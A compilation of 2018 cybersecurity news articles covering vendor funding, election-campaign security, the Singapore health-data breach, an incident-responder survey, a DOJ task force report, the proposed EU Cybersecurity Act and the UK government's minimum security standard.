RiskRecon Raises $25 Million to Grow Third-Party Cyber Risk Management Business
8.8.2018 securityweek Cyber

Salk Lake City-based RiskRecon, which offers solutions to help companies manage third-party cyber risk, has raised $25 million in Series B financing, the company announced Wednesday.

The Series B round brings the total amount raised by RiskRecon to more than $40 million.

RiskRecon helps its customers control third-party risk by providing assessments of each third-party’s security practices, which can be used to establish a base level of trust and identify specific areas for further discussion and investigation.

The company, which has nearly tripled its customer base in the last twelve months, says the additional funding will be used to support increasing demand for its third-party cyber risk management solutions.

“Though most businesses have no choice but to obtain internet services, security solutions, and a range of other business-critical technologies from third-party providers, they do have a choice in how they manage the associated security risks,” noted SecurityWeek contributor Josh Lefkowitz in a recent column.

“Third-party risk management is the process of holding enterprises accountable to good security practices,” explained Kelly White, RiskRecon’s CEO and Co-founder. “As you improve the risk management of your third parties, you improve the collective security of the Internet.”

The Series B round was led by Accel and joined by existing investors Dell Technologies Capital, General Catalyst, and Fidelity’s F-Prime Capital. Several existing individual investors also participated in the round.

“As we talk to our CISOs, we see a growing need for third-party risk management as enterprises have become more intertwined with third-party service providers,” said Nate Niparko, a partner at Accel.

“Conducting thorough due diligence on a prospective vendor’s security is essential,” Lefkowitz added in his April 2018 column. “The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.”


Campaigns on Their Own as Cyber Threats Roil Midterms
6.8.2018 securityweek  Cyber

NEW YORK (AP) — Kamala Harris has been the target of social media misinformation campaigns since she became a U.S. senator.

Every month for the last 18 months, her office has discovered on average between three and five fake Facebook profiles pretending to be hers, according to a Harris aide. It's unclear who creates the pages, which are often designed to mislead American voters about the ambitious Democratic senator's policies and positions.

The aide spoke on the condition of anonymity, like more than a half dozen campaign officials contacted for this story, for fear of attracting unwanted attention from adversaries or scrutiny on the Senate office's evolving cybersecurity protocols.

Such internet mischief has become commonplace in U.S. politics. Facebook announced earlier this week that it uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms. Senior intelligence officials declared Thursday that foreign adversaries continue waging a quiet war against U.S. campaigns and election systems.

Still, one thing has become clear: With the midterm elections just three months away, campaigns are largely on their own in the increasingly challenging task of protecting sensitive information and countering false or misleading content on social media.

The Democratic National Committee has worked to strengthen its own internal security protocols and encouraged state parties to do the same, according to Raffi Krikorian, who previously worked for Uber and Twitter and now serves as the DNC's chief technology officer.

But in an interview, he acknowledged there are limits to how much the national party can protect the thousands of Democratic campaigns across the country.

"We're providing as much assistance to campaigns as we can, but there's only so much we can do," Krikorian said.

"For all the high-level campaigns I'm worried, but at least there are people to talk to," he continued. "The mid-sized campaigns are at least getting technical volunteers, but the truly down-ballot campaigns, that's where the state parties and coordinated campaigns can help, but there's no doubt that this is an uphill battle when we're dealing with a foreign adversary."

Officials in both political parties have intensified cybersecurity efforts, although the known cases of interference have so far overwhelmingly focused on Democrats.

The DNC now has a staff of 40 on its technical team, led by Krikorian and other Silicon Valley veterans hired in the months after Russians hacked the party's email system and released a trove of damaging messages in the months before President Donald Trump's 2016 victory.

Top U.S. intelligence and homeland security officials raised new alarms Thursday about outside efforts to influence the 2018 and 2020 elections during a White House press briefing.

Homeland Security chief Kirstjen Nielsen said: "Our democracy is in the crosshairs," while Director of National Intelligence Dan Coats added: "We continue to see a pervasive messaging campaign by Russia to try to weaken and divide the United States."

Facebook said it removed 32 accounts from its site and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts, which featured names such as "Black Elevation" and "Resisters" and were designed to manipulate Americans with particular ethnic, cultural or political identities.

In many cases, House and Senate political campaigns said they're just beginning to adopt basic internal security protocols, such as two-step verification for all email, storage and social media accounts and encrypted messaging services such as Wickr.

There is no protocol in place for campaigns or national parties to monitor broader social media misinformation campaigns, however. Nor is there any sign that law enforcement is playing a proactive role to protect campaigns from meddling on a day-to-day basis.

The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression, but campaigns report no regular contact with law enforcement officials.

"At the end of the day, the U.S. government is not putting any type of a bubble around any (campaign). They do not have the authority, capacity or capability to do it," said Shawn Henry, a former senior FBI official who now leads the cybersecurity firm CrowdStrike, which works with political campaigns. "NSA is not sitting in the ISPs filtering out malicious traffic."

Henry added: "They've got to take pro-active actions themselves."

Earlier this month, Microsoft said it discovered a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said this week that additional analysis confirmed the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017. Former Democratic U.S. Rep. Brad Ashford of Nebraska also recently confirmed that his 2016 campaign emails had been hacked by Russian agents.

Ashford, who narrowly lost his seat to Republican Don Bacon that year, said hackers obtained all of his campaign email correspondence with the Democratic Congressional Campaign Committee. He said he was notified of the breach in late July or early August 2016 by House Democratic Leader Nancy Pelosi's office.

Ashford has said he doesn't believe any of the stolen information ever went to Bacon or the Republican Party, and he doesn't know whether it made a difference in his race. He did face a series of anonymous political attacks on social media.

By their very nature, U.S. political campaigns can be a challenge to defend from a cybersecurity standpoint. They are essentially pop-up organizations that rely heavily on volunteers and are focused on a singular task — winning. In addition, high-level IT expertise costs money and campaigns typically run on tight budgets.

Some 2018 House campaigns have yet to hire basic communications staffers.

In the case of California Sen. Harris, who is considered a 2020 presidential prospect, her office plans to continue rooting out fake social media profiles on its own. They have had no contact with the FBI. They have reported the issue to Facebook in every case — not the other way around.

"It's on the forefront of everybody's mind," said Patrick McHugh, a former Senate campaign official who now leads the Democratic-aligned super PAC Priorities USA.

He acknowledged the tremendous challenge for many campaigns.

"All it takes is one person on a campaign to make a mistake," McHugh said. "You're up against a foreign country. That's a pretty big adversary that can and will go to all ends to get in."


US, Australia Work to Improve Cyber Capabilities
26.7.2018 securityweek Cyber

The United States and Australia have signed an agreement that will enable the two allies to conduct research and development to advance their combined cyber capabilities, officials said Tuesday.

Nowhere "is the need for innovation more critical than in cyber, which continues to be a pervasive threat to our militaries and to our businesses," Australian Defence Minister Marise Payne said at a US-Australian summit in California.

US Defense Secretary Jim Mattis said the two countries had signed a memorandum of understanding "to deepen cybersecurity cooperation."

The move comes amid ongoing hacking thefts of sensitive information from military networks, and Russia's continued attempts to subvert democracy in America and elsewhere.

On a separate topic, an Australian reporter asked Mattis whether he thought the Australian navy should conduct a so-called "freedom of navigation" operation to challenge Chinese claims of sovereignty on militarized islets in the South China Sea.

The longstanding issue poses a dilemma for Canberra, with Australian lawmakers debating how much the country should align itself with its longstanding ally America, or pay more heed to the desires of China, its biggest trade partner.

"As far as freedom of navigation decisions by Australia, that's a sovereign decision by a sovereign state," Mattis said.

"We'll just leave that decision with the people of Australia, which is exactly where it belongs."

US Secretary of State Mike Pompeo and his Australian counterpart Julie Bishop also attended the annual summit.

Pompeo was asked about US views of holding Russia to account over its role in the 2014 shootdown of Malaysia Airlines flight MH-17 over Ukraine, when 298 people, including 38 Australian citizens and residents, were killed.

"We need the Russians to continue to be held accountable for that," Pompeo said.

"We take this matter seriously and we committed over these last two days, as we have for the last months, to continue to support every effort through the Joint Investigative Team to hold the perpetrators for this heinous activity accountable."


State-Actors Likely Behind Singapore Cyberattack: Experts
23.7.2018 securityweek Cyber

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

Hoh told national broadcaster Channel NewsAsia that the attack was an "advanced persistent threat".

"The nature of such attacks are that they are conducted by nation states using very advanced tools," he said.

"They tend to be well resourced, well-funded and highly sophisticated."

Russia -- which is accused of meddling in the US presidential election -- China, Iran and North Korea are believed to have the capability to carry out such attacks.

Analysts, however, would not be drawn into speculation on who might be behind the hack or why Singapore was targeted.

The attack started two weeks after the wealthy city-state hosted the historic summit between US President Donald Trump and North Korean leader Kim Jong Un.

Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

"Any non-public health information could be used for extortion. Russian spy services have a long history of doing this."

Medical information, like personal data, can also be easily monetised on criminal forums, said Sanjay Aurora, Asia-Pacific managing director of Darktrace.

"Beyond making a quick buck, a more sinister reason to attack would be to cause widespread disruption and systemic damage to the healthcare service -- as a fundamental part of critical infrastructure –- or to undermine trust in a nation's competency to keep personal data safe," he told AFP.

- Hyper-connected -

Today, cybercriminals are targeting more than just individuals or banks, said Shahnawaz Backer, regional security specialist at F5 Networks.

"Government services, from healthcare to education, are targets that are just as likely, as evidenced by the recent attacks in Singapore," Backer said.

"As Singapore embraces the digital revolution, security breaches are bound to happen. Our growing digital footprint is growing every day, and enterprises need to take strict measures to safeguard and protect their data."

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the breach. A former judge will head an inquiry looking into the hack.

Singapore officials have cautioned against jumping to conclusions about the attackers.

"With regard to the prime minister's data and why he was targeted, I would say that it's perhaps best not to speculate what the attacker had in mind," said David Koh, head of Singapore's Cyber Security Agency.

The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their bedrooms to nation-states.

Earlier this month, US intelligence chief Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".


A Cyber Axis of Evil is Rewriting the Cyber Kill Chain
22.7.2018 securityweek Cyber

Survey of Incident Responders Shows That Businesses Needs to Re-architect Cybersecurity

The cyber kill chain employed by advanced adversaries is changing. Defenders need to evolve their defensive strategies to meet the new challenge; and they need to develop silent hunting skills.

A new study from Carbon Black queried 37 incident response firms that use its threat hunting tool to gain insight into what is happening after an attacker has breached the network. "The inspiration for this report," Tom Kellermann, the author and chief cybersecurity officer at Carbon Black told SecurityWeek, "was, I was tired of seeing reports that are focused on just the vector of attack -- how they got in versus how they stay in. There has been a dramatic shift in how cybercriminals operate -- they have moved from burglary to home invasion, and we now need to be asking different questions. The adversaries are typically inside networks for months."

Key statistics from the report picked out by Kellerman include the predominance of Russia and China as adversaries. Eighty-one percent of respondents highlighted Russia, and 76% highlighted China. Thirty-five percent say that the end goal is espionage.

Sixty percent of the attacks involve lateral movement, indicating that attacks are no longer smash and grab incidents -- adversaries are now intending to stick around for the long game. This is confirmed by the appearance of incident response countermeasures. Nearly half of the respondents have seen instances of counter-incident response. Sixty-four percent have seen instances of secondary C2 being used on a sleep cycle during their IR engagements. Thirty-six percent of attackers use the victim for island hopping; that is, as a supply chain attack. And -- perhaps worryingly -- 10% have witnessed non-ransomware destruction.

Global Cyber threats push businesses to Re-architect cybersecurity"I think the destruction figure is quite worrying if it grows," Kellermann told SecurityWeek; noting that there are already signs that it is doing so. He suggested three primary motivations: activism (possibly patriotic), revenge (for being discovered), and the destruction of forensic evidence. "There's a fundamental lesson we need to take away from this," he said: "we have to become more clandestine and more quiet when we hunt the adversary in our homes. We can no longer shout out, 'I know you're in my house; I've called the police'. That is exactly what Crowdstrike did when it was responsible for investigating the DNC breach, it was too loud in its incident response which is why the Russians dug and burrowed in deeper and deeper -- and that was evidenced in the indictments."

The biggest single takeaway that Kellermann has from this survey is that the way to counter the new long-term, advanced and evasive incursions is to develop silent hunting techniques. If hunting is too noisy, the adversary will simply burrow deeper, employ incident-response countermeasures, or simply destroy the network and leave.

"This evolution coincides with mounting geopolitical tensions," suggests the report. "Nation-states such as Russia, China, Iran and North Korea are actively operationalizing and supporting technologically advanced cyber militias."

Kellermann believes that this new level of attack sophistication is down to the increasing level of nation-state hacking -- although the hacking itself may be done by a national militia rather than direct government employees. "We're seeing cybercriminals act as cyber militias for nation states," he explained.

Take Russia and the GRU units indicted by Deputy Attorney General Rosenstein as an example. "Those GRU units typically in the past didn't have any real level of cyber-attack sophistication. The Silicon Valley of cyber-attack sophistication in Russia was St Petersburg -- so they called upon great cybercriminals like Alexsey Belan and Evgeniy Bogachev to essentially arm them with the greatest zero-day attack code and exploit kits in addition to showing them how to morph and change their kill chain."

The Chinese adversaries are also learning and adapting. "The Chinese," he said, "having learned from the mistakes of their past, where they never practiced good operational security and they were typically too loud when they broke into networks... well, they're becoming much more clandestine and much more elegant in the way they attack corporations. Particularly," he added, "in using island hopping -- as evidenced by the Cloud Hopper campaign where they targeted the SMPs of a dozen major corporations in the West. After compromising the MSPs they then leapfrogged into the corporate networks via their cloud infrastructure for the purposes of economic espionage."

The coincidence of changing and more advanced attacks with the rise of nation state actors is compelling; but suggestions that it is primarily Russia and China is down to the accuracy of attribution.

"This attribution comes from the incident response responders to the survey," says Kellermann. "These folks typically worked in British or US intelligence or law enforcement communities; and they understand the fingerprints, the TTPs associated with specific threat actor groups, and the modus operandi. Not only that, you can typically see the C&Cs and the secondary C&Cs leveraging back to infrastructure that is operated or controlled by specific entities."

Kellermann believes there really is -- effectively -- a cyber axis of evil, primarily comprising Russia, China, North Korea, and to a lesser extent, Iran. The first three have an unwritten operational agreement not to target each other. "None of these three will hack the others, and at the same time they are benefitting from each other's colonization of wide swathes of the West."

Russia and North Korea are particularly close. "Both Russia and North Korea are counteracting economic sanctions imposed by the West with cybercrime against the financial sector," he said. "North Korea itself has become much more adept and sophisticated with their cyber-attacks as they are mirroring the Russian kill chain, and they are using more and more exploits and more and more custom malware. Just as the North Korean missile systems are typically based on Russian missiles, so you have the same amount of tech transfer in cyber capabilities."

He sees no reduction in cyber-attacks from any of these countries, and expects South China Sea tensions and the potential for global trade wars to simply exacerbate the problem. "In fact," he said, "the new group Hidden Cobra has been quite prolific -- you just don't hear much about them because the financial institution victims are trying to keep this conversation quiet. But Hidden Cobra is the greatest testament to the advancement of cyber capabilities in North Korea."

Nor does he exclude Iran from this group, pointing out that as long ago as the Stuxnet issue, it was Russia that Iran turned to for, and received from, cyber assistance. There are even suggestions that Russian experts analyzed Stuxnet and returned it to Iran in the form of the original Shamoon malware used against Saudi Aramco.

But Kellermann doesn't think an understanding of the source of the attacks is an important as an understanding of how they are being operated. "I really think that the indications of counter incident response are the powerful statistics; and that 36% of the attacks are not directed against the initial victim -- basically, after they've done stealing from you they're going to use your network to target people that trust you. That has to be something we are acutely aware of and cognizant of in how we structure business partnerships, and in how we secure our information supply chain going forward."

He feels that the U.S. is currently suffering under an Administration that is not sufficiently focused on cyber security. "Not only does the US not even have a Cyber Czar, but this Administration has not taken cyber security seriously -- as evidenced by the rapid retirement rate of professionals who would have been lifers under a different administration. I am incredibly concerned that we're dealing with an adversary that has already colonized wide swathes of British and American infrastructure, and we're really fighting someone from the inside out."

He believes that the real message coming from this survey of incident responders is that business needs to re-architect its cybersecurity. "We need to change the architectural model away from a castle-like structure and more towards that of a prison, where we can force the adversary to be resourced constrained, where we inhibit their capacity to move laterally and we hunt them and monitor them without them knowing that we're doing so. That's the type of environment we need to migrate to -- I call that environment 'intrusion suppression'."

To achieve this, he believes that business must move to silent hunting. "This could be done with iron boxing, modern whitelisting, next gen AV that includes endpoint detection and response, and deception technology. Hunt tools need to be more widely deployed. Memory augmentation should be employed, and adaptable authentication based on the level of risk can enforce 2 or 3 factor authentication with a biometric live challenge/response, all depending on the level of risk. Existing outward-facing network defenses are largely failing. The modern network has really evolved to cloud and mobility which makes the security of the endpoints paramount, and the capacity to record and monitor all activity on the endpoints is absolutely quintessential to success."


DOJ Cybersecurity Task Force Outlines Plans for Protecting Elections
22.7.2018 securityweek Cyber

The U.S. Justice Department’s Cyber-Digital Task Force made public its first report on Thursday, covering the threat to elections, cybercrime schemes, and various other topics.

The role of the Cyber-Digital Task Force, announced in February by the Attorney General, is to help the Department of Justice find ways to combat cyber threats and become more efficient in this area.

The task force focuses on election interference, critical infrastructure disruptions, use of the Internet for spreading violent ideologies and recruiting followers, botnets, the use of technology designed to hide criminal activities, and the theft of sensitive data.

The first chapter of the 156-page report focuses on what the Attorney General describes as “one of the most pressing cyber-enabled threats” confronting the U.S., specifically “malign foreign influence operations” and their impact on elections and other democratic institutions.

The types of threats described in the report include operations targeting voting machines, voter registration databases and other election infrastructure; operations targeting political entities; and covert influence operations whose goal is to harm political organizations and public officials.

The report specifically names Russia and cites the recent indictments related to the hacking of the Democratic National Committee (DNC) and attempts to influence the 2016 presidential election.

Authorities are also concerned about disinformation operations that abuse social media and other forums to influence public opinion and sow division, and overt influence operations that involve lobbyists and foreign media.

The report also focuses on the upcoming midterm elections, which intelligence officials believe will be targeted by Russia. The Kremlin is expected to apply lessons learned from the campaign aimed at the 2016 election.

The task force has outlined plans to combat threats to the 2018 midterm elections, including ballot fraud, for which authorities believe the risk is real, despite no evidence of successful attempts.

The report also describes a framework for countering malign foreign influence operations aimed at the midterm elections.

Microsoft representatives revealed this week that the company already identified election-related hacking attempts. The tech giant spotted some phishing websites that appeared to be aimed at three unnamed congressional candidates.

“The Department of Justice plays an important role in combating foreign efforts to interfere in our elections, but it cannot alone solve the problem. There are limits to the Department’s role—and the role of the U.S. government—in addressing foreign influence operations aimed at sowing discord and undermining our Nation’s institutions,” the task force noted. “Combating foreign influence operations requires a whole-of-society approach that relies on coordinated actions by federal, State, and local government agencies; support from potential victims and the private sector; and the active engagement of an informed public.”

The next two chapters of the report are dedicated to cybercrime schemes, including damage to computer systems, fraud, data theft, threats to privacy (e.g. sextortion), and critical infrastructure attacks.

Chapter 4 of the report shows how the FBI responds to cyber threats, and Chapter 5 describes the Department of Justice’s efforts on training and managing its workforce.

The complete report is available from the DOJ in PDF format.


Proposed EU Cybersecurity Product Certification Scheme Has Global Effects
19.7.2018 securityweek Cyber

The European Union is active in passing cybersecurity legislation ostensibly for the European Union but with worldwide ramifications. The General Data Protection Regulation (GDPR), and the Payment Services Directive 2 (PSD2) are recent examples. This process is similar on a global scale to California on a U.S. federal scale -- the respective markets are so important that vendors tend to comply generally.

There is more coming from the EU: the proposed Cybersecurity Act (9350/18) (PDF). On July 10, the proposal passed one of the major hurdles for new legislation when it was approved by the European Parliament's Industry Committee by 55 votes to five with one abstention. The key features of the proposal are to give more authority, budget and responsibility to the European Union Agency for Network and Information Security (ENISA); and to develop "European cybersecurity certification schemes for the purpose of ensuring an adequate level of cybersecurity of ICT processes, products and services in the Union."

The likelihood of the proposal proceeding to binding legislation can be gauged by the Industry Committee's reaction: it seeks to strengthen the proposal by making the certification mandatory for the critical infrastructure industries (the original proposal does not require certification, suggesting it should be voluntary). At this stage we do not know the details of the final outcome, but we can be fairly certain that there will be a new unified European certification scheme designed, developed and operated by ENISA.

The scope of the certification scheme is wide. Title III, paragraph 2 of the Act states, "The European cybersecurity certification framework defines a mechanism to establish European cybersecurity certification schemes and to attest that the ICT processes, products and services that have been evaluated in accordance with such schemes comply with specified security requirements with the aim to protect the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the functions or services offered by, or accessible via, those products, processes, and services throughout their life cycle." It covers both traditional computer devices and the connected devices that comprise the Internet of Things (IoT).

The intention seems to be for ENISA to develop three levels of product assurance: basic, substantial and high.

The Cybersecurity Act generates mixed feelings, especially among non-EU companies operating or trading with Europe. There have been, and still are, many different security product certification schemes worldwide; and some feel that this will be just another burden placed on device manufacturers. Ilia Kolochenko, CEO of High-Tech Bridge is unsure of the need for a new scheme.

"Based on the information currently available about the ENISA certification," he told SecurityWeek, "I cannot see any substantially new or significantly better approach to cybersecurity or privacy compared to numerous already existing certifications, regulations or international standards such as ISO 27001."

The danger in new, locally-based, requirements is that they can further balkanize any attempts at global harmonization -- and given current global political and economic tensions, the result could do more harm than good. "In light of the escalating tariff war between the US and Europe," Kolochenko continued, "further segmentation of cybersecurity certifications and accreditations will inevitably bring more confusion and add unnecessary complexity -- let alone Russia or China with their own rules of the game. Different communities of experts will compete to make their standard slightly better, instead of joining their efforts to bring a unified global set of simple but efficient rules."

In August 2017, the IOT Cybersecurity Coalition wrote to the European Commission offering advice and voicing concerns. For example, it urges the EU to 'leverage existing best practices and global industry-led standards'.

"This avoids burdening multinational enterprises with the requirements of conflicting jurisdictions while facilitating interoperability, compatibility, reliability, and security on a global scale." This is part of the 'regulations inhibit innovation' argument. The Coalition fears that existing voluntary efforts "would be stymied by the slow and unitary nature of the EU standards development process should the EU move forward with mandatory standards, testing, and labelling requirements. Meanwhile, threat actors will continue to innovate unhindered."

Kolochenko touches on this concern. "One should be careful not to overestimate the value of a certification. Certification is merely a beautiful facade, behind which there is a reality. We have seen quite a few breaches of PCI DSS certified merchants and similarly notorious cases." He is concerned that industry will spend more time on ensuring that products they use are correctly certified than on ensuring their digital premises are really secure. "Paper security may undermine practical security," he said.

The Coalition considers the potential for a false sense of security based on trust labels that could potentially have been issued several years earlier to be a concern. "Specifically," it says, "we remain concerned that pushing for generic or blanket cybersecurity labelling of IoT products could result in counterproductive technology mandates, new market access barriers, or roadblocks to innovation without necessarily bringing any real security or privacy benefits that could not otherwise be achieved on the basis of already existing instruments."

In February this year, AmCham EU (the American Chamber of Commerce to the European Union, claiming to be the voice of American business in Europe) published its own critique of the Cybersecurity Act. It welcomes the plan to convert ENISA into a permanent EU cybersecurity agency with greater power and resources, but urges the agency to strengthen its collaboration with industry "in an inclusive and transparent way."

AmCham has major reservations over the effect of certification on industry. "The framework should be voluntary and market-driven in nature as companies should be able to develop the security system features best for their unique risk situation... The proposal should also take into account the possibility of self-declaration."

Kolochenko doesn't think this is likely -- or if initially possible, it will necessarily remain so. "Of course, it’s a question of how the certification will be used and where it will be mandatory, but one may reasonably assume that European governmental entities and some companies will require it -- and prefer it to NIST or any foreign standards that have existed for more than a decade."

Transparency -- or its lack -- is as much a concern for AmCham as it is for the IOT Cybersecurity Coalition. "The proposed process lacks provisions for adequate transparency and openness, and is ultimately not reflecting the provisions and best practices under the WTO Agreement on Technical Barriers to Trade."

Some concerns seem to have been met. "The limitation of the applicability of certifications to a maximum of three years under Article 48.6 is particularly problematic," says AmCham. The current draft proposal has struck out "a maximum period of three years" and replaced it with "the period defined by the particular certification scheme". Nevertheless, this concern links back to the 'false sense of security' concern: a product may have been in compliance when it was tested, but how can you guarantee it is still in compliance, or not vulnerable to a newly discovered zero-day vulnerability today?

Indeed, this raises a further legal or at least moral complication. If a product fails to meet its description, there is potential for legal action against the manufacturer. But if a product has been 'guaranteed' by ENISA certification and still fails, who is liable: the manufacturer, ENISA or the European Commission?

It would be wrong, however, to suggest that the proposed certifications are completely without support. "I welcome any initiative to increase the security and assurance of ICT products," comments Ed Williams, director EMEA of SpiderLabs at Trustwave; "given the current climate this legislation is welcome... ICT products can be difficult and complex: ensuring that security is baked in could, initially, be difficult but is clearly the correct thing to do -- secure by design is a must in 2018 and moving forward. I, for one," he added, "hope that this certification framework is successful in raising what is currently a low bar. Good luck!"


Why Banning Risks to Cybersecurity Doesn’t Actually Improve Cybersecurity

5.7.2018 securityaffairs Cyber

There’s a prevailing mindset that suggests if organizations ban all the things that pose risks to overall cybersecurity, they’re taking the most effective approach to make their organizations secure.
Initially, that line of thinking seems sensible in some regards. After all, if the aspects that threaten cybersecurity aren’t allowed at all, the problems they pose could never crop up.

But, that belief is far too simplistic. Other interventions must occur to make cybersecurity a priority, whether it’s for specific websites or entire establishments.

1. Bans Could Limit or Prevent Access to Technology
Officials associated with the U.S. government are aiming to block Huawei components from entering the country’s marketplace if they’re used on communications equipment. The argument is that those parts compromise the nation’s security.

But, it’s a short-sighted approach since all the nation’s telecommunications providers already depend on equipment from Chinese manufacturers. Instituting a ban on goods for Huawei could prevent companies from getting federal funding that increases access to technology in communities with limited internet access.

Moreover, the economical prices associated with Huawei equipment make the items fit the budgets of small carriers that cannot afford pricier goods. If telecommunications providers no longer have the option to buy and use Huawei merchandise, the households and businesses in rural areas may have no means for getting internet access.

Instead of focusing on individual companies and prohibiting those from selling goods to companies in the U.S., it’s preferable for the country to develop a comprehensive national security strategy that’s not brand dependent.

2. Existing Cybersecurity Plans Generally Fall Short
A report from the U.S. State Department warned that it’s still easy to find cybersecurity vulnerabilities at public and private organizations despite increased investments meant to protect the respective networks.

A plan that only involves banning specific software titles or manufacturers isn’t robust enough because it’s not all-encompassing. Instead, organizations need to carry out intensive security audits and identify all the weak points in the networks and proactively try to minimize them.

In many cases, they can do this by implementing some of the most promising technological strategies. For example, context-based authentication and authorization use analytic data to calculate a risk score that determines whether to grant, deny or challenge a person’s access attempts.

Plus, if organizations attempt to ban software on workplace computers, that step might not be sufficient because so many people use mobile devices and apps to access workplace content from home, and their employers likely don’t know it’s happening.

3. Risks Are Not Always Apparent
It could take weeks or even months before organizations realize certain kinds of software may be detrimental to their overall cybersecurity strategies. That’s especially true because such findings are often discovered by diligent independent researchers who sound the alarm for the benefit of the public.

The Amazon Echo is one example of a gadget with software that’s had some gaping holes. In one instance, researchers illuminated an issue that could allow hackers to listen to, transcribe and transmit things people said after they used an Alexa skill that seemed legitimate.

Amazon quickly responded to the incident and fixed the problem. However, this case study proves it’s not always possible to tell whether software is risky or safe. People use Alexa daily without problems, but that doesn’t mean the software is trouble-free, nor that companies should rush to ban it.

If companies are too quick to disallow some kinds of software, they could prevent employees from accessing things at their workplaces that are genuinely helpful. In short, there is not a straightforward, fail-safe method for determining if a piece of software is safe or problematic. Even the most well-built software can have shortcomings.

4. We’re Living in a Global Economy
Wayne Jones, the chief information officer at the National Nuclear Security Administration, points out that instead of enforcing bans, the better approach to take is to figure out how to use software in ways that protect a company’s information.

He also brought up how we’re all living in a global economy, and that’s another reason why software bans don’t have the intended effect of bolstering cybersecurity.

The people who develop software and work on other tech-related projects often originate from foreign nations.

If the U.S. made a federal decision not to use equipment made by Huawei, would that ruling eventually progress to prevent anyone with past ties to the company from working for a United States business, then bar people from certain nations from taking tech-related jobs in the U.S?

If so, the United States could find its tech development efforts substantially hindered, not to mention spend a significant amount of time determining which equipment features parts manufactured by countries on a theoretical “banned” list.

A Proactive Stance Is Essential
One thing people must remember is that cybercriminals tend to find ways to infiltrate systems even when doing so means overcoming obstacles. That means an outright ban on software — or anything else that might compromise cybersecurity — isn’t advisable.

Instead, organizations of all sizes must show proactiveness and learn to monitor for threats, counteract infiltration attempts and tighten their infrastructures when necessary.

Cybersecurity


UK Publishes Minimum Cyber Security Standard for Government Departments
28.6.2018 securityweek Cyber

The UK government's Cabinet Office has published the first iteration of its Minimum Cyber Security Standard, which will be incorporated into the Government Functional Standard for Security. The standard is mandatory for all government departments (which includes 'organizations, agencies, Arm’s Length Bodies and contractors'); but provides an excellent security checklist/framework for all commercial organizations.

It is a surprisingly short document (PDF); just seven pages comprising 10 sections under five categories: Identify, Protect, Detect, Respond and Recover. It largely follows the wider European approach of mandating outcomes rather than specific means to achieve those outcomes -- but is not entirely devoid of specific instructions.

For example, Section 6_d _iv includes, "You shall register for and use the NCSC's Web Check service." Web Check is part of the NCSC's Active Defense program. It is designed to check public sector websites for common vulnerabilities, and by this time last year was quietly scanning more than 1,200 government sites every day.

Other requirements include support for TLS v1.2, and the implementation of Domain-based Message Authentication Reporting and Conformance (DMARC) "to make email spoofing difficult".

Another requirement (6_d_i) is that departments must, "Ensure the web application is not susceptible to common security vulnerabilities, such as described in the top ten Open Web Application Security Project (OWASP) vulnerabilities." How that is ensured, like all requirements, is not specified.

For example, MFA is required (where feasible), but no specific factors or methods are described (7_b). It therefor allows for, but does not mention, evolving behavioral biometric factors.

This is by design. The document itself says, "As far as possible the security standards define outcomes, allowing Departments flexibility in how the standards are implemented, dependent on their local context."

This lack of detailed prescription is welcomed by Sanjay Kalra, co-founder and chief product officer at Lacework. "This is especially important for organizations that operate workloads in the cloud," he told SecurityWeek. "Where change is rapid and continuous; the appropriate cloud security measures require flexibility in their approach. In some ways, the Standard is similar in structure to GDPR, where the emphasis is on the outcome, but the guidelines for implementation allow for a common-sense approach that is flexible enough to allow for what works best for the organization.”

The publication is largely well-received by the security industry. Ilia Kolochenko, CEO of High-Tech Bridge (which offers its own web scanning service for both public and private industry), told SecurityWeek, "Simplicity and efficiency are successfully combined in the document. Today, many governmental entities don’t even know where and how to start cybersecurity, and this document will certainly help them structure and manage their digital risks and implement proper cybersecurity processes."

It’s also exciting to see, he added, "some simple, but clear and effective, technical requirements such as proper TLS encryption and obligatory testing of web applications for OWASP Top 10."

Matt Lock, director of sales engineers at Varonis, fears its simplicity is deceptive. "The minimum standards may sound simple on paper," he told SecurityWeek, "but even large organizations may struggle putting these steps into practice." Joseph Carson, Chief Security Scientist at Thycotic, adds, "As always, the questions for all of these standards will depend on the ability to enforce them.”

Carson also notes that securing the supply chain includes insistence that suppliers meet the UK Cyber Essentials level 6. H is somewhat concerned that the whole process could be "an indication that as the UK government prepares for the imminent Brexit, it is taking its own direction when it comes to cybersecurity. However, past incidents reveal that a cybersecurity strategy that does not extend beyond the country’s borders is doomed for failure as it assumes all cybercrime only occurs from within."

